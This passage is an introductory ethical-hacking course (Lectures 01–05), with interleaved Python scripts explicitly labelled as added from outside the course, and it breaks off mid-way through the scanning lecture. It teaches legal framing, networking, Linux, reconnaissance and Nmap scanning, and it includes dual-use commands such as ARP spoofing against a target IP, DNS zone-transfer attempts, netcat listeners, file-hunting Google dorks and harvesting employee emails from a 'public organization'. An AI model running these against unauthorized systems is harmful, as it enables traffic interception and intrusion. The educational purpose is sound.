Lecture 01 · Fundamentals

Introduction to Ethical Hacking

Beginner ~50 min

What is Ethical Hacking?

Ethical Hacking (also known as White Hat Hacking) is the authorized practice of bypassing system security to identify potential vulnerabilities. Ethical hackers help organizations strengthen their defenses by simulating real cyberattacks.

Unlike malicious hackers, ethical hackers operate under a strict scope of engagement — every action is documented, authorized, and reported back to the client. The end goal is always to improve security, never to exploit it for personal gain.

Key Principles

  • Permission First — Always obtain written authorization before testing
  • Legal & Ethical — Follow laws and professional codes of conduct
  • Responsible Disclosure — Report findings professionally and within agreed timelines
  • Do No Harm — Avoid disrupting production systems or exposing sensitive data
  • Confidentiality — Protect all client data and findings from third parties

Types of Hackers

The security community categorizes hackers by their intent and authorization level, often using "hat" color as a metaphor:

  • White Hat — Authorized security professionals who test systems with permission to improve defenses.
  • Black Hat — Malicious actors who exploit vulnerabilities for personal gain, data theft, or sabotage.
  • Grey Hat — Operate without clear authorization but typically without malicious intent.
  • Script Kiddies — Unskilled attackers using pre-built tools without understanding them.
  • Hacktivists — Hack for political or social causes (e.g., Anonymous).
  • Nation-State Actors — Government-sponsored groups targeting critical infrastructure.

The 5 Phases of Ethical Hacking

Every professional penetration test follows a structured methodology. Understanding these phases is fundamental before touching any tool:

  1. Reconnaissance (Footprinting) — Passively gather information about the target: domain names, IP ranges, employee info, technologies in use. Tools: whois, theHarvester, Shodan, Google Dorks.
  2. Scanning & Enumeration — Actively probe the target for open ports, running services, OS versions, and potential entry points. Tools: nmap, netcat, nikto.
  3. Gaining Access (Exploitation) — Use identified vulnerabilities to gain entry into the system using tools like Metasploit, SQLMap, or custom exploits.
  4. Maintaining Access — Demonstrate whether an attacker could persist undetected — simulating APTs via backdoors or rootkits.
  5. Covering Tracks & Reporting — Document all findings with evidence, severity ratings, and remediation advice. Ethical hackers write detailed reports instead of erasing logs.

Legal & Compliance Frameworks

Before beginning any engagement, understand the legal landscape. Unauthorized hacking — even with good intent — is a criminal offense in most countries.

  • CFAA (Computer Fraud and Abuse Act) — USA. Criminalizes unauthorized computer access. Always get written permission.
  • Computer Misuse Act 1990 — UK. Covers unauthorized access and modification of computer material.
  • IT Act 2000 — India. Sections 43 & 66 deal with unauthorized access and hacking offenses.
  • GDPR — EU. Governs how personal data found during tests must be handled and protected.
  • EC-Council Code of Ethics — Global (CEH). Professional conduct standards for certified ethical hackers.

⚠️ Always Get a Signed Scope of Work (SOW)

A verbal agreement is not enough. Always obtain a signed document specifying the target systems, allowed techniques, testing window, and emergency contacts. This protects both you and your client.

Tools & Environment Setup

For hands-on labs, we use Kali Linux running in a virtual machine — an isolated environment specifically designed for penetration testing. Never practice on systems you don't own or have written permission to test.

Recommended Setup

  • Hypervisor: VirtualBox (free) or VMware Workstation
  • OS: Kali Linux 2024.x (rolling release)
  • RAM: Allocate at least 4 GB to the VM
  • Storage: 50 GB minimum disk image
  • Network Mode: NAT (for internet) or Host-Only (for isolated labs)

terminal (Kali) — Initial Setup
# Update system and install core tools
sudo apt update && sudo apt upgrade -y
sudo apt install nmap metasploit-framework burpsuite wireshark -y

# Verify installations
nmap --version
msfconsole --version

terminal (Kali) — Explore Your Environment
# Who am I?
whoami && id

# Network interfaces
ifconfig   # or: ip addr show

# Open ports on localhost
netstat -tuln

# Quick scan of your own VM
nmap -sV 127.0.0.1

Key Terminology

You'll encounter these terms constantly throughout the course:

  • Vulnerability — A weakness in a system that can be exploited.
  • Exploit — Code or technique that takes advantage of a vulnerability.
  • Payload — The part of the exploit that performs the actual action (e.g., opens a shell).
  • CVE — Common Vulnerabilities and Exposures, a public database of known security flaws.
  • Zero-Day — A vulnerability unknown to the vendor with no available patch.
  • Attack Surface — All the points where an attacker could try to enter a system.
  • Penetration Test — A simulated cyberattack authorized to evaluate system security.
  • Social Engineering — Manipulating people into divulging confidential information.

Career Paths in Ethical Hacking

The cybersecurity field offers multiple specialized roles. Here's where ethical hacking skills lead:

  • Penetration Tester (Pentester) — Simulate attacks on client infrastructure
  • Red Team Operator — Conduct advanced adversarial simulations against organizations
  • Bug Bounty Hunter — Find vulnerabilities in public programs (HackerOne, Bugcrowd) for rewards
  • Security Analyst (SOC) — Monitor and respond to security incidents
  • Malware Analyst / Reverse Engineer — Dissect malicious software to understand behavior
  • CTF Player — Capture the Flag competitions to sharpen skills (TryHackMe, HackTheBox)

📜 Recommended Certifications

  • CEH (EC-Council) — Entry-level, theory-heavy
  • eJPT (eLearnSecurity) — Great hands-on starter
  • CompTIA Security+ — Widely recognized baseline
  • OSCP (Offensive Security) — Gold standard, highly practical

🎯 Exercise 1.1 — Environment Setup

Install Kali Linux in a virtual machine (VirtualBox/VMware). Run whoami and ifconfig to explore your environment. Read the EC-Council Code of Ethics.

🎯 Exercise 1.2 — Reconnaissance Warm-Up

Using only passive techniques (no scanning), research a domain you own or a test domain like scanme.nmap.org. Use whois, nslookup, and Google to gather as much information as you can. Document your findings.

terminal — Exercise 1.2
whois scanme.nmap.org
nslookup scanme.nmap.org
dig scanme.nmap.org ANY

🎯 Exercise 1.3 — Identify Your Attack Surface

Run a basic Nmap scan against your own VM's IP to see what services are exposed. Compare the open ports with what you expect. Which services can you turn off to reduce the attack surface?

terminal — Exercise 1.3
# Replace with your VM's IP (OS detection with -O needs root, so run with sudo)
sudo nmap -sV -O 192.168.x.x

Lecture 02 · Fundamentals

Network Basics for Ethical Hackers

Beginner ~60 min Requires: Lecture 01

Why Network Knowledge is Critical for Hacking

Almost every attack starts with understanding how networks communicate. As an ethical hacker, you must master networking concepts to identify vulnerabilities, map targets, and execute attacks safely.

Networks are the highways of the digital world — and understanding how data travels across them gives you the ability to intercept, redirect, or block it. Whether you're sniffing packets, exploiting misconfigured services, or pivoting through a compromised host, every technique builds on a solid foundation of networking knowledge.

1. OSI Model vs TCP/IP Model

The OSI (Open Systems Interconnection) model is a conceptual framework that standardizes how different network protocols interact. The TCP/IP model is the practical implementation used on the modern internet. As a hacker, you'll think in terms of both — understanding which layer an attack targets is essential for diagnosis and exploitation.

| OSI Layer       | TCP/IP Layer   | Key Protocols / Tools           |
|-----------------|----------------|---------------------------------|
| 7. Application  | Application    | HTTP, HTTPS, FTP, DNS, SMTP     |
| 6. Presentation | Application    | SSL/TLS, JPEG, ASCII            |
| 5. Session      | Application    | NetBIOS, RPC                    |
| 4. Transport    | Transport      | TCP, UDP, SCTP                  |
| 3. Network      | Internet       | IP, ICMP, IGMP, Routing         |
| 2. Data Link    | Network Access | Ethernet, MAC Address, ARP, PPP |
| 1. Physical     | Network Access | Cables, Switches, Wi-Fi signals |

Hacker's Perspective on the OSI Model

  • Layer 7 (Application) — SQL injection, XSS, directory traversal, API abuse
  • Layer 4 (Transport) — Port scanning, SYN floods, session hijacking
  • Layer 3 (Network) — IP spoofing, ICMP attacks, route manipulation
  • Layer 2 (Data Link) — ARP poisoning, MAC flooding, VLAN hopping
  • Layer 1 (Physical) — Cable tapping, rogue access points, hardware implants

2. IP Addressing

Every device on a network is identified by an IP address. IPv4 uses 32-bit addresses (e.g., 192.168.1.1) while IPv6 uses 128-bit addresses. Understanding subnetting is critical — it tells you the size of a network and which hosts are reachable without routing.

terminal
ip addr show          # Linux
ipconfig              # Windows

# Example IPv4: 192.168.1.105/24
# Example IPv6: 2001:db8::1/64

Public vs Private IPs

  • Private: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 — not routable on the internet
  • Public: Routable on the internet, assigned by ISPs
  • Loopback: 127.0.0.1 — refers to the local machine itself
  • APIPA: 169.254.x.x — auto-assigned when DHCP fails (a red flag in recon)

Subnetting Quick Reference

  • /24 — 256 addresses, 254 usable (most common home/office network)
  • /16 — 65,536 addresses (large corporate networks)
  • /8 — 16 million addresses (ISP-level blocks)
  • /32 — A single host (used in firewall rules and routing)

terminal — Subnet Calculator
# Install ipcalc on Kali
sudo apt install ipcalc -y

# Calculate subnet info
ipcalc 192.168.1.0/24

# Output shows: Network, Broadcast, HostMin, HostMax, Hosts/Net
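The same calculation in Python, as an added example that is not part of the course material: it reproduces the fields ipcalc prints using only the standard-library ipaddress module, classifies an address against the private, loopback and APIPA ranges listed above, and answers the "reachable without routing" question from the subnetting paragraph.

```python
"""Subnet calculator reproducing ipcalc's fields (added example, not from the course)."""
import ipaddress

# Blocks from the "Public vs Private IPs" list above.
SPECIAL_RANGES = {
    "private (RFC 1918)": ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"),
    "loopback": ("127.0.0.0/8",),
    "link-local / APIPA": ("169.254.0.0/16",),
}


def classify(ip: str) -> str:
    """Name the special range an IPv4 address belongs to, or 'public' if none matches."""
    addr = ipaddress.IPv4Address(ip)
    for label, blocks in SPECIAL_RANGES.items():
        if any(addr in ipaddress.IPv4Network(block) for block in blocks):
            return label
    return "public"


def subnet_info(cidr: str) -> dict:
    """Return the fields ipcalc prints for a prefix such as 192.168.1.0/24.

    strict=False accepts a host address with its mask (192.168.1.105/24, as
    `ip addr show` displays it) and derives the network it belongs to.
    /31 and /32 have no separate network/broadcast addresses, so every
    address in them is usable; every other prefix loses those two.
    """
    net = ipaddress.IPv4Network(cidr, strict=False)
    total = net.num_addresses
    if net.prefixlen >= 31:
        usable, host_min, host_max = total, net.network_address, net.broadcast_address
    else:
        usable = total - 2
        host_min = net.network_address + 1
        host_max = net.broadcast_address - 1
    return {
        "network": str(net.network_address),
        "netmask": str(net.netmask),
        "broadcast": str(net.broadcast_address),
        "host_min": str(host_min),
        "host_max": str(host_max),
        "total": total,
        "hosts": usable,
        "class": classify(str(net.network_address)),
    }


def reachable_without_routing(host_cidr: str, other_ip: str) -> bool:
    """True when other_ip lies inside the host's own subnet, so the host can
    ARP for it directly instead of handing the packet to the default gateway."""
    net = ipaddress.IPv4Network(host_cidr, strict=False)
    return ipaddress.IPv4Address(other_ip) in net


if __name__ == "__main__":
    for cidr in ("192.168.1.0/24", "10.0.0.0/8", "172.16.5.9/12", "8.8.8.8/32"):
        info = subnet_info(cidr)
        print(f"{cidr:18} net={info['network']:15} bcast={info['broadcast']:15} "
              f"hosts={info['hosts']:<10} {info['class']}")
    print(reachable_without_routing("192.168.1.105/24", "192.168.1.200"))  # True
    print(reachable_without_routing("192.168.1.105/24", "192.168.2.1"))    # False
```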

3. TCP vs UDP

TCP (Transmission Control Protocol) establishes a reliable connection using a 3-way handshake (SYN → SYN-ACK → ACK) before any data is transferred. UDP (User Datagram Protocol) sends data without establishing a connection — faster but unreliable. Understanding this distinction directly impacts how you scan ports and craft exploits.

| Feature          | TCP                                           | UDP                                          |
|------------------|-----------------------------------------------|----------------------------------------------|
| Connection       | Connection-oriented (3-way handshake)         | Connectionless                               |
| Reliability      | Reliable (ACK, retransmission)                | Unreliable                                   |
| Speed            | Slower                                        | Faster                                       |
| Use Cases        | HTTP, SSH, FTP                                | DNS, VoIP, Gaming, Streaming                 |
| Hacker Relevance | SYN scans, session hijacking, banner grabbing | UDP scans, DNS poisoning, amplification DDoS |

The TCP 3-Way Handshake

Understanding the handshake is critical for port scanning techniques like Nmap's SYN scan (-sS), which sends a SYN and never completes the handshake — making it stealthier than a full connect scan.

  • SYN — Client says "I want to connect"
  • SYN-ACK — Server says "OK, I'm listening"
  • ACK — Client confirms "Connection established"
  • RST — Port is closed (no service listening)
  • No response / filtered — Firewall is likely blocking the port

4. DNS — The Internet's Phone Book

DNS (Domain Name System) translates human-readable domain names like google.com into IP addresses. DNS is a goldmine for recon — misconfigured DNS servers can leak internal hostnames, mail servers, and subdomains.

terminal — DNS Recon
# Basic DNS lookup
nslookup example.com

# Detailed query with dig
dig example.com ANY

# Attempt zone transfer (often misconfigured)
dig axfr @ns1.example.com example.com

# Find mail servers
dig example.com MX

# Reverse lookup (IP → hostname)
dig -x 93.184.216.34

Important DNS Record Types

  • A — Maps domain to IPv4 address
  • AAAA — Maps domain to IPv6 address
  • MX — Mail server for the domain
  • NS — Authoritative name servers
  • CNAME — Alias pointing to another domain
  • TXT — Text records (SPF, DKIM, verification tokens — great for recon)
  • PTR — Reverse DNS lookup record

5. Common Ports You Must Know

Memorizing key ports helps you instantly recognize what services are running when you see Nmap scan results. Open ports are potential entry points — each one represents a service that may have vulnerabilities.

| Port      | Protocol | Service              | Hacker Notes                                                 |
|-----------|----------|----------------------|--------------------------------------------------------------|
| 20/21     | TCP      | FTP                  | Check for anonymous login, cleartext credentials             |
| 22        | TCP      | SSH                  | Brute-force, weak keys, outdated versions                    |
| 23        | TCP      | Telnet               | Cleartext — capture with Wireshark, always try default creds |
| 25        | TCP      | SMTP                 | Open relays, user enumeration (VRFY, EXPN commands)          |
| 53        | TCP/UDP  | DNS                  | Zone transfers, DNS cache poisoning, subdomain enum          |
| 80        | TCP      | HTTP                 | Web app attacks: SQLi, XSS, LFI, directory traversal         |
| 443       | TCP      | HTTPS                | Check SSL/TLS version, certificate info, same web attacks    |
| 445       | TCP      | SMB                  | EternalBlue (MS17-010), null sessions, pass-the-hash         |
| 3306      | TCP      | MySQL                | Default creds, remote root access if misconfigured           |
| 3389      | TCP      | RDP                  | BlueKeep, brute-force, credential stuffing                   |
| 8080/8443 | TCP      | HTTP Alt / HTTPS Alt | Admin panels, dev servers often left exposed                 |

6. Essential Networking Tools

  • ifconfig / ip addr — View and configure network interfaces
  • ping — Test host reachability and measure latency via ICMP
  • traceroute / tracert — Map the route packets take to a destination
  • nslookup / dig — Perform DNS queries and enumerate records
  • netstat / ss — View active connections and listening ports
  • arp -a — View the ARP cache (MAC-to-IP mappings on the LAN)
  • route / ip route — View and manipulate the routing table
  • nc (netcat) — The "Swiss Army knife" — connect to ports, transfer files, open shells
  • wireshark / tcpdump — Capture and analyze live network traffic
  • nmap — Port scanning, OS detection, service version enumeration

terminal — Netcat Essentials
# Connect to a port (banner grabbing)
nc -v 192.168.1.1 80

# Listen for incoming connection
nc -lvnp 4444

# Simple port scan with netcat
nc -zv 192.168.1.1 20-100

# Transfer a file (receiver first)
nc -lvnp 4444 > received_file.txt
nc 192.168.1.1 4444 < file_to_send.txt

terminal — Wireshark / tcpdump
# Capture all traffic on eth0
sudo tcpdump -i eth0

# Capture only HTTP traffic
sudo tcpdump -i eth0 port 80

# Save capture to file for Wireshark
sudo tcpdump -i eth0 -w capture.pcap

# Open in Wireshark
wireshark capture.pcap

7. ARP & MAC Addresses

ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local network. It operates at Layer 2 and has no built-in authentication — making it vulnerable to ARP poisoning / spoofing, a foundational technique in man-in-the-middle (MitM) attacks.

  • MAC Address — 48-bit hardware identifier (e.g., AA:BB:CC:DD:EE:FF)
  • ARP Request — "Who has 192.168.1.1? Tell 192.168.1.5"
  • ARP Reply — "192.168.1.1 is at AA:BB:CC:DD:EE:FF"
  • ARP Poisoning — Send fake ARP replies to redirect traffic through your machine

terminal — ARP
# View ARP cache
arp -a

# ARP scan the local network
sudo arp-scan --localnet

# ARP spoofing with arpspoof (dsniff package)
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
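The defender's side of the same protocol, added here and not part of the course: a check that parses `arp -a` output and reports the two cache symptoms ARP poisoning leaves behind (one MAC answering for several IPs, and a known gateway whose MAC has changed). The ARP lines and the trusted gateway MAC are constructed for the example.

```python
"""ARP-cache consistency check (added example, not from the course): parses
`arp -a` output and reports the cache changes ARP poisoning produces."""
import re
import shutil
import subprocess
from collections import defaultdict

# Constructed sample of Linux `arp -a` output; not captured from a real network.
ARP_CACHE = """\
gateway (192.168.1.1) at aa:bb:cc:dd:ee:ff [ether] on eth0
fileserver (192.168.1.5) at aa:bb:cc:dd:ee:ff [ether] on eth0
printer (192.168.1.20) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.30) at <incomplete> on eth0
"""

# Assumed baseline: the gateway's real MAC, recorded when the lab network was built.
TRUSTED = {"192.168.1.1": "de:ad:be:ef:00:01"}

ARP_LINE = re.compile(
    r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I
)


def parse_arp_cache(text: str) -> dict:
    """Return {ip: mac} for resolved entries; '<incomplete>' lines carry no MAC and are skipped."""
    entries = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            entries[m["ip"]] = m["mac"].lower()
    return entries


def find_anomalies(entries: dict, trusted: dict) -> list:
    """Two indicators, each returned as a plain string:
    1. one MAC answering for several IPs: a poisoner's MAC shows up for both the
       gateway and the victim (a router with secondary addresses can do this
       legitimately, so treat it as a lead, not proof);
    2. a trusted IP whose MAC differs from the recorded baseline."""
    alerts = []
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for {len(ips)} IPs: {', '.join(sorted(ips))}")
    for ip, good_mac in trusted.items():
        seen = entries.get(ip)
        if seen is not None and seen != good_mac.lower():
            alerts.append(f"{ip} now maps to {seen}, baseline was {good_mac}")
    return alerts


def read_live_cache() -> dict:
    """Read this machine's cache; falls back to the constructed sample when `arp` is absent."""
    if shutil.which("arp") is None:
        return parse_arp_cache(ARP_CACHE)
    out = subprocess.run(["arp", "-a"], capture_output=True, text=True, check=False).stdout
    return parse_arp_cache(out)


if __name__ == "__main__":
    cache = parse_arp_cache(ARP_CACHE)
    for alert in find_anomalies(cache, TRUSTED):
        print("ALERT:", alert)
```

Run it periodically against `read_live_cache()` with your own gateway recorded in TRUSTED and a clean cache produces no output.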

✅ Pro Tip

Always start reconnaissance with passive techniques before active scanning to avoid detection. Active scanning (like Nmap) generates traffic logs — passive recon (Shodan, WHOIS, Google Dorks) leaves no trace on the target's systems.

🎯 Exercise 2.1 — Network Exploration

  1. Find your IP address and default gateway.
  2. Ping google.com and note the TTL value — what OS does it suggest?
  3. Use nslookup to find the IP of a website.
  4. Run traceroute google.com (or tracert on Windows) and count the hops.

🎯 Exercise 2.2 — DNS Enumeration

Using dig, enumerate the DNS records of a domain you own or a practice domain. Try to retrieve A, MX, NS, and TXT records. Attempt a zone transfer and document whether it succeeds or fails — and why.

terminal — Exercise 2.2
dig example.com A
dig example.com MX
dig example.com NS
dig example.com TXT
dig axfr @ns1.example.com example.com

🎯 Exercise 2.3 — Banner Grabbing

Use netcat to connect to port 80 of a web server and manually send an HTTP request. Observe what information the server reveals in its response headers (server type, version, OS). This is called banner grabbing — a key recon technique.

terminal — Exercise 2.3
# Connect to web server
nc -v example.com 80

# Then type the following and press Enter twice:
HEAD / HTTP/1.0

# Look for: Server:, X-Powered-By:, Set-Cookie: fields

🎯 Exercise 2.4 — TCP vs UDP Report

Write a short report (in a text file) explaining the difference between TCP and UDP with real-world examples relevant to hacking. Include: how Nmap handles each differently, which attacks target TCP vs UDP, and why UDP scanning is slower and less reliable.

Lecture 03 · Fundamentals

Linux & Command Line Mastery for Hackers

Beginner ~65 min Requires: Lecture 02

Why Linux is Essential for Ethical Hacking

Linux dominates servers, cloud infrastructure, IoT devices, and cybersecurity tooling. Ethical hackers rely on Linux because it provides:

  • Full control over the system (open-source kernel)
  • Powerful command-line tools for automation
  • Built-in networking and scripting capabilities
  • Security-focused distributions like Kali Linux and Parrot OS

⚠️ Hacker Insight

Most real-world attacks and defenses happen on Linux systems. Mastering the terminal is non-negotiable.

1. Linux File System Hierarchy

  • / — Root directory (everything starts here)
  • /home — User files
  • /root — Root user home
  • /etc — Configuration files
  • /var — Logs and variable data
  • /tmp — Temporary files
  • /bin & /usr/bin — Executable commands
  • /sbin — System binaries (admin commands)
  • /dev — Device files
  • /proc — Process and kernel info

2. Essential Commands Every Hacker Must Know

Navigation & File Management

pwd                    # Print Working Directory
ls -la                 # List files (detailed + hidden)
cd /etc                # Change directory
mkdir tools            # Create directory
touch test.txt         # Create empty file
cp file1 file2         # Copy
mv old new             # Move / Rename
rm -rf folder          # Remove (DANGEROUS)
find / -name "test"    # Find files

System Information & Processes

uname -a               # System info
whoami                 # Current user
id                     # User + group info
ps aux                 # Running processes
top / htop             # Live process monitor
kill PID               # Kill process
df -h                  # Disk usage
free -m                # Memory usage
uptime                 # System uptime

Networking Commands

ifconfig / ip addr     # Network interfaces
ping 8.8.8.8           # Test connectivity
netstat -tuln          # Open ports
ss -tuln               # Faster alternative
traceroute google.com  # Route tracking
curl example.com       # HTTP requests
wget url               # Download files

3. File Permissions & Ownership (CRITICAL)

Understanding permissions is key for both attacking and securing systems.

ls -l
chmod 755 file.sh
chmod +x script.sh
chown user:group file

Each permission is a bit value; add them up per triad (owner, group, others) to get the octal mode:

  • r (read) = 4
  • w (write) = 2
  • x (execute) = 1

Example: 755 = owner (rwx), group (rx), others (rx)
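An added example (not from the course) that converts between the octal and symbolic forms above, including the setuid/setgid/sticky bits ls -l shows as s and t, and flags the permission patterns worth auditing; audit_tree walks a directory of your choice with os.lstat.

```python
"""Permission-bit helpers and a risk check for octal/symbolic modes
(added example, not from the course)."""
import os
import stat

# (shift, special bit, letter shown in the execute slot when that bit is set)
_TRIADS = ((6, stat.S_ISUID, "s"), (3, stat.S_ISGID, "s"), (0, stat.S_ISVTX, "t"))


def mode_to_symbolic(mode: int) -> str:
    """0o755 -> 'rwxr-xr-x'; setuid/setgid/sticky appear as s/t (S/T when x is absent), as ls -l does."""
    out = []
    for shift, special, letter in _TRIADS:
        bits = (mode >> shift) & 0o7
        r = "r" if bits & 4 else "-"
        w = "w" if bits & 2 else "-"
        if mode & special:
            x = letter if bits & 1 else letter.upper()
        else:
            x = "x" if bits & 1 else "-"
        out.append(r + w + x)
    return "".join(out)


def symbolic_to_mode(sym: str) -> int:
    """'rwxr-xr-x' -> 0o755 (inverse of mode_to_symbolic; takes the 9 characters after the type char)."""
    if len(sym) != 9:
        raise ValueError("expected 9 permission characters, e.g. rwxr-xr-x")
    mode = 0
    for i, (shift, special, _) in enumerate(_TRIADS):
        r, w, x = sym[3 * i:3 * i + 3]
        bits = (4 if r == "r" else 0) | (2 if w == "w" else 0)
        if x in "xst":        # lowercase letter: execute bit is set
            bits |= 1
        if x in "sStT":       # any of these: the special bit is set
            mode |= special
        mode |= bits << shift
    return mode


def risk_flags(mode: int, is_dir: bool = False) -> list:
    """Permission patterns that deserve a second look: the 'misconfigured
    permissions' the lecture warns about. World-writable directories are
    acceptable only with the sticky bit (as /tmp has)."""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_ISGID and mode & stat.S_IXGRP:
        flags.append("setgid")
    if mode & stat.S_IWOTH:
        if is_dir:
            if not mode & stat.S_ISVTX:
                flags.append("world-writable directory without sticky bit")
        else:
            flags.append("world-writable")
    return flags


def audit_tree(root: str = ".") -> list:
    """Walk a directory and return (path, symbolic mode, flags) for every risky entry."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):   # symlink modes are meaningless; skip them
                continue
            flags = risk_flags(st.st_mode, stat.S_ISDIR(st.st_mode))
            if flags:
                findings.append((path, mode_to_symbolic(st.st_mode), flags))
    return findings


if __name__ == "__main__":
    print(oct(symbolic_to_mode("rwxr-xr-x")), mode_to_symbolic(0o755))
    for path, sym, flags in audit_tree("/tmp"):
        print(f"{sym} {path}: {', '.join(flags)}")
```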

💡 Hacker Tip

Misconfigured permissions are one of the easiest privilege escalation vectors.

4. Text Processing Tools (Hacker’s Best Friends)

  • cat — View file
  • grep — Search patterns
  • sed — Modify streams
  • awk — Advanced processing
  • cut / sort / uniq — Data filtering

grep bash /etc/passwd
ps aux | grep apache
netstat -tuln | grep 80
cut -d: -f1 /etc/passwd
sort users.txt | uniq

5. Redirection & Pipes (Power Feature)

command > file.txt      # Overwrite output
command >> file.txt     # Append output
command 2> error.log    # Errors only
command1 | command2     # Pipe output

Chaining commands allows automation and complex data extraction—essential for reconnaissance.

6. Package Management

sudo apt update
sudo apt upgrade
sudo apt install nmap
sudo apt remove package

7. Kali Linux Specific Tools

  • nmap — Network scanning
  • metasploit — Exploitation
  • burpsuite — Web testing
  • wireshark — Packet analysis
  • john / hashcat — Password cracking
  • aircrack-ng — WiFi hacking

8. Basic Bash Scripting

#!/bin/bash
echo "User: $(whoami)"
echo "IP: $(hostname -I)"
echo "System: $(uname -a)"

Make executable:

chmod +x script.sh
./script.sh

🚀 Why Scripting Matters

Hackers automate repetitive tasks like scanning, enumeration, and reporting using scripts.

🎯 Exercise 3.1 — Linux Exploration

  1. Find all files containing "password" in /etc
  2. List all listening ports
  3. Create a directory recon and a file targets.txt
  4. Use history to see previous commands

🎯 Exercise 3.2 — Bash Script

Create system_info.sh that shows:

  • Current user
  • IP address
  • OS version
  • Running services

🔥 Challenge Exercise

Write a one-liner command to: list all users, filter only those with bash shell, and save output to a file.

Lecture 04 · Fundamentals

Reconnaissance & Footprinting

Intermediate ~70 min Requires: Lecture 03

What is Reconnaissance?

Reconnaissance (Recon) is the first and most critical phase of ethical hacking. It involves gathering intelligence about a target system, network, or organization. The goal is to build a complete attack surface map before any exploitation begins.

🧠 Key Principle

The more you know about the target, the fewer guesses you need to make later.

Types of Reconnaissance

| Type          | Description                       | Risk Level        | Examples                            |
|---------------|-----------------------------------|-------------------|-------------------------------------|
| Passive Recon | No direct interaction with target | Low (stealthy)    | Google, WHOIS, Shodan, Social Media |
| Active Recon  | Direct interaction with target    | High (detectable) | Port scanning, Ping sweeps          |

Recon Workflow (Real-World)

  1. Identify target scope (domains, IPs)
  2. Gather passive intelligence (OSINT)
  3. Enumerate subdomains
  4. Discover live hosts
  5. Scan ports and services
  6. Identify technologies and vulnerabilities

1. Passive Reconnaissance Techniques

WHOIS Lookup

whois example.com
whois -h whois.iana.org example.com

Reveals domain owner, registrar, DNS servers, and registration dates.

Google Dorks (Advanced Search)

site:example.com filetype:pdf
inurl:admin site:example.com
intitle:"index of" "parent directory"
site:example.com ext:sql | ext:log

Shodan & Censys

Search engines that index internet-connected devices, open ports, and exposed services.

theHarvester (Email & Domain Info)

theHarvester -d example.com -b google
theHarvester -d example.com -b linkedin

2. Subdomain Enumeration (CRITICAL)

Subdomains often expose hidden services and entry points.

sublist3r -d example.com
amass enum -d example.com
assetfinder example.com

Validate live subdomains:

cat subs.txt | httpx

3. Active Reconnaissance

Host Discovery

ping -c 4 target.com
nmap -sn 192.168.1.0/24        # Ping sweep

Port Scanning with Nmap

sudo nmap -sV -O target.com       # Service + OS detection (-O needs root)
sudo nmap -sS -p- target.com      # Full port scan (-sS needs root)
sudo nmap -sC -sV -A target.com   # Aggressive scan (-A includes OS detection)
nmap -oX scan.xml target.com      # Save XML output

Service Enumeration

nmap -sV --script=banner target.com
nmap --script vuln target.com

4. DNS Reconnaissance

dig example.com ANY
dig mx example.com
dnsenum example.com
dnsrecon -d example.com -t std

Look for:

  • Mail servers (MX records)
  • Subdomains
  • Zone transfer misconfigurations

5. Web Application Recon

whatweb example.com
wappalyzer
nikto -h example.com
gobuster dir -u http://example.com -w wordlist.txt

Identify:

  • Technologies (PHP, Apache, WordPress)
  • Hidden directories
  • Outdated software

6. OSINT Framework

  • People search: LinkedIn, Pipl
  • Email discovery: Hunter.io
  • Leaks & breaches: HaveIBeenPwned
  • Metadata extraction: exiftool

7. Automation & Recon Pipelines

sublist3r -d example.com > subs.txt
cat subs.txt | httpx > live.txt
nmap -iL live.txt -sV -oA results

🚀 Pro Tip

Automation is what separates beginners from professionals. Build recon pipelines.

8. Documentation & Reporting

Always document findings:

  • Discovered domains and IPs
  • Open ports and services
  • Potential vulnerabilities
  • Screenshots and logs

⚠️ Legal Warning

Never perform active reconnaissance without explicit written authorization. Unauthorized scanning can be illegal.

🎯 Exercise 4.1 — Passive Recon

Choose a public organization and gather:

  • WHOIS info
  • Subdomains
  • Public IP ranges
  • Employee emails

🎯 Exercise 4.2 — Active Recon

Using a lab or authorized target:

  1. Perform host discovery
  2. Run full port scan
  3. Save results in XML

🔥 Challenge Exercise

Build a full recon pipeline that:

  • Finds subdomains
  • Filters live hosts
  • Scans services
  • Outputs structured results

Lecture 05 · Fundamentals

Scanning & Enumeration

Intermediate ~75 min Requires: Lecture 04

Introduction to Scanning

Scanning is the phase where an attacker or ethical hacker actively interacts with a target to identify live systems, open ports, running services, and possible entry points.

It comes after reconnaissance and before exploitation. At this stage, you are no longer guessing — you are verifying.

🧠 Key Idea

Recon tells you where to look. Scanning tells you what is actually there.

1. Host Discovery (Finding Live Targets)

Before scanning ports, you need to know which machines are alive. This avoids wasting time scanning offline systems.

nmap -sn 192.168.1.0/24              # Ping sweep (no port scan)
sudo nmap -PE -PP -PM target.com     # Different ICMP probes (raw ICMP needs root)
sudo masscan -p80,443 192.168.1.0/24 --rate=1000   # masscan also needs raw sockets

Explanation

  • -sn → Host discovery only (no ports scanned)
  • -PE → ICMP echo (like ping)
  • -PP → Timestamp request
  • -PM → Netmask request

💡 Real-World Tip

Many systems block ping. A host may still be alive even if it doesn't respond to ICMP.

Example Output

Nmap scan report for 192.168.1.10
Host is up (0.0030s latency)

This confirms the machine is reachable and worth scanning further.

2. Port Scanning Techniques

Ports are entry points into a system. Each open port usually corresponds to a service.

| Scan Type         | Command  | Stealth | Explanation                                 |
|-------------------|----------|---------|---------------------------------------------|
| TCP SYN Scan      | nmap -sS | High    | Half-open scan (doesn't complete handshake) |
| TCP Connect       | nmap -sT | Low     | Full connection (easier to detect)          |
| UDP Scan          | nmap -sU | Medium  | Finds services like DNS, SNMP               |
| Version Detection | nmap -sV | Medium  | Identifies service versions                 |

Example

sudo nmap -sS -p 22,80,443 target.com   # SYN scan needs root

Sample Output Explained

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

  • open → Service is accessible
